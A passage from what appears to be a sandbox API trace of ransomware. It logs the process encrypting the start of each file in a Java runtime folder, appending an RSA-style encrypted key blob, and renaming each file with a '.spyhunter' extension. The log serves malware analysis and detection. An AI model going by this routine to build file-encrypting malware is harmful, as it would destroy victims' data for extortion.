pbData=0x31f020*, pdwDataLen=0x270f500*=0x30) returned 1 [0125.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.272] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc") returned 56 [0125.272] StrStrW (lpFirst="default.jfc", lpSrch=".txt") returned 0x0 [0125.272] GetProcessHeap () returned 0x2c0000 [0125.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.272] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4c4*=0x2800, lpOverlapped=0x0) returned 1 [0125.274] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.274] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4c4*=0x2800, lpOverlapped=0x0) returned 1 [0125.274] GetProcessHeap () returned 0x2c0000 [0125.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.274] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.274] WriteFile (in: hFile=0xf4, lpBuffer=0x270f504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x270f504*, lpNumberOfBytesWritten=0x270f4c4*=0x4, lpOverlapped=0x0) returned 1 [0125.275] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4c4*=0x30, lpOverlapped=0x0) returned 1 [0125.275] CloseHandle (hObject=0xf4) returned 1 [0125.275] GetProcessHeap () returned 0x2c0000 [0125.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.275] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.spyhunter") returned 66 [0125.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc.spyhunter")) returned 1 [0125.366] GetProcessHeap () returned 0x2c0000 [0125.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.366] GetProcessHeap () returned 0x2c0000 [0125.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.366] GetProcessHeap () returned 0x2c0000 [0125.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e600c0 | out: hHeap=0x2c0000) returned 1 [0125.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f500 | out: pbBuffer=0x270f500) returned 1 [0125.366] GetProcessHeap () returned 0x2c0000 [0125.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4f8*=0x30) returned 1 [0125.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.367] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf") returned 70 [0125.367] StrStrW (lpFirst="LucidaBrightRegular.ttf", lpSrch=".txt") returned 0x0 [0125.368] GetProcessHeap () returned 0x2c0000 [0125.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.368] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4bc*=0x2800, lpOverlapped=0x0) returned 1 [0125.473] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.473] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4bc*=0x2800, lpOverlapped=0x0) returned 1 [0125.473] GetProcessHeap () returned 0x2c0000 [0125.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.473] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.473] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x270f4fc*, lpNumberOfBytesWritten=0x270f4bc*=0x4, lpOverlapped=0x0) returned 1 [0125.480] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4bc*=0x30, lpOverlapped=0x0) returned 1 [0125.480] CloseHandle (hObject=0xf4) returned 1 [0125.481] GetProcessHeap () returned 0x2c0000 [0125.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.481] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.spyhunter") returned 80 [0125.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf.spyhunter")) returned 1 [0125.484] GetProcessHeap () returned 0x2c0000 [0125.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.484] GetProcessHeap () returned 0x2c0000 [0125.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.484] GetProcessHeap () returned 0x2c0000 [0125.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cdb0 | out: hHeap=0x2c0000) returned 1 [0125.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f500 | out: pbBuffer=0x270f500) returned 1 [0125.484] GetProcessHeap () returned 0x2c0000 [0125.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4f8*=0x30) returned 1 [0125.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar") returned 51 [0125.486] StrStrW (lpFirst="plugin.jar", lpSrch=".txt") returned 0x0 [0125.486] GetProcessHeap () returned 0x2c0000 [0125.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.486] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4bc*=0x2800, lpOverlapped=0x0) returned 1 [0125.494] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.496] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4bc*=0x2800, lpOverlapped=0x0) returned 1 [0125.496] GetProcessHeap () returned 0x2c0000 [0125.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.496] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.496] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x270f4fc*, lpNumberOfBytesWritten=0x270f4bc*=0x4, lpOverlapped=0x0) returned 1 [0125.524] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4bc*=0x30, lpOverlapped=0x0) returned 1 [0125.525] CloseHandle (hObject=0xf4) returned 1 [0125.525] GetProcessHeap () returned 0x2c0000 [0125.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.525] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.spyhunter") returned 61 [0125.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar.spyhunter")) returned 1 [0125.525] GetProcessHeap () returned 0x2c0000 [0125.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.526] GetProcessHeap () returned 0x2c0000 [0125.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.526] GetProcessHeap () returned 0x2c0000 [0125.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3f40 | out: hHeap=0x2c0000) returned 1 [0125.526] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4f8 | out: pbBuffer=0x270f4f8) returned 1 [0125.526] GetProcessHeap () returned 0x2c0000 [0125.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4f0*=0x30) returned 1 [0125.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.539] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties") returned 57 [0125.539] StrStrW (lpFirst="sound.properties", lpSrch=".txt") returned 0x0 [0125.539] GetProcessHeap () returned 0x2c0000 [0125.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.539] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4b4*=0x4ba, lpOverlapped=0x0) returned 1 [0125.559] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.559] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4ba, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4b4*=0x4ba, lpOverlapped=0x0) returned 1 [0125.559] GetProcessHeap () returned 0x2c0000 [0125.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.559] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.559] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x270f4f4*, lpNumberOfBytesWritten=0x270f4b4*=0x4, lpOverlapped=0x0) returned 1 [0125.559] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4b4*=0x30, lpOverlapped=0x0) returned 1 [0125.560] CloseHandle (hObject=0xf4) returned 1 [0125.560] GetProcessHeap () returned 0x2c0000 [0125.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0125.560] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.spyhunter") returned 67 [0125.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties.spyhunter")) returned 1 [0125.561] GetProcessHeap () returned 0x2c0000 [0125.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0125.561] GetProcessHeap () returned 0x2c0000 [0125.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.561] GetProcessHeap () returned 0x2c0000 [0125.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60180 | out: hHeap=0x2c0000) returned 1 [0125.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4f8 | out: pbBuffer=0x270f4f8) returned 1 [0125.561] GetProcessHeap () returned 0x2c0000 [0125.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4f0*=0x30) returned 1 [0125.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar") returned 66 [0125.563] StrStrW (lpFirst="local_policy.jar", lpSrch=".txt") returned 0x0 [0125.563] GetProcessHeap () returned 0x2c0000 [0125.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.563] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4b4*=0xb9b, lpOverlapped=0x0) returned 1 [0126.847] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffff465, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.848] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb9b, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4b4*=0xb9b, lpOverlapped=0x0) returned 1 [0126.848] GetProcessHeap () returned 0x2c0000 [0126.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0126.848] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.848] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x270f4f4*, lpNumberOfBytesWritten=0x270f4b4*=0x4, lpOverlapped=0x0) returned 1 [0126.848] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4b4*=0x30, lpOverlapped=0x0) returned 1 [0126.848] CloseHandle (hObject=0xf4) returned 1 [0126.848] GetProcessHeap () returned 0x2c0000 [0126.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.848] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.spyhunter") returned 76 [0126.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar.spyhunter")) returned 1 [0126.849] GetProcessHeap () returned 0x2c0000 [0126.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.849] GetProcessHeap () returned 0x2c0000 [0126.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0126.850] GetProcessHeap () returned 0x2c0000 [0126.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03e98 | out: hHeap=0x2c0000) returned 1 [0126.850] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4f0 | out: pbBuffer=0x270f4f0) returned 1 [0126.850] GetProcessHeap () returned 0x2c0000 [0126.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0126.850] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4e8*=0x30) returned 1 [0126.850] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0126.850] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist") returned 59 [0126.851] StrStrW (lpFirst="blacklist", lpSrch=".txt") returned 0x0 [0126.851] GetProcessHeap () returned 0x2c0000 [0126.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0126.851] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4ac*=0xad2, lpOverlapped=0x0) returned 1 [0126.852] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffff52e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.853] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xad2, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4ac*=0xad2, lpOverlapped=0x0) returned 1 [0126.853] GetProcessHeap () returned 0x2c0000 [0126.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0126.853] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.853] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x270f4ec*, lpNumberOfBytesWritten=0x270f4ac*=0x4, lpOverlapped=0x0) returned 1 [0126.853] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4ac*=0x30, lpOverlapped=0x0) returned 1 [0126.853] CloseHandle (hObject=0xf4) returned 1 [0126.853] GetProcessHeap () returned 0x2c0000 [0126.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.853] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.spyhunter") returned 69 [0126.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist.spyhunter")) returned 1 [0126.855] GetProcessHeap () returned 0x2c0000 [0126.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.855] GetProcessHeap () returned 0x2c0000 [0126.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0126.855] GetProcessHeap () returned 0x2c0000 [0126.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e600c0 | out: hHeap=0x2c0000) returned 1 [0126.855] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4f0 | out: pbBuffer=0x270f4f0) returned 1 [0126.855] GetProcessHeap () returned 0x2c0000 [0126.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0126.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4e8*=0x30) returned 1 [0126.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0126.856] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index") returned 51 [0126.856] StrStrW (lpFirst="meta-index", lpSrch=".txt") returned 0x0 [0126.856] GetProcessHeap () returned 0x2c0000 [0126.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0126.856] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4ac*=0x88e, lpOverlapped=0x0) returned 1 [0126.930] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffff772, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.930] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x88e, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4ac*=0x88e, lpOverlapped=0x0) returned 1 [0126.930] GetProcessHeap () returned 0x2c0000 [0126.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0126.930] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.930] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x270f4ec*, lpNumberOfBytesWritten=0x270f4ac*=0x4, lpOverlapped=0x0) returned 1 [0126.930] WriteFile (in: hFile=0xf4, 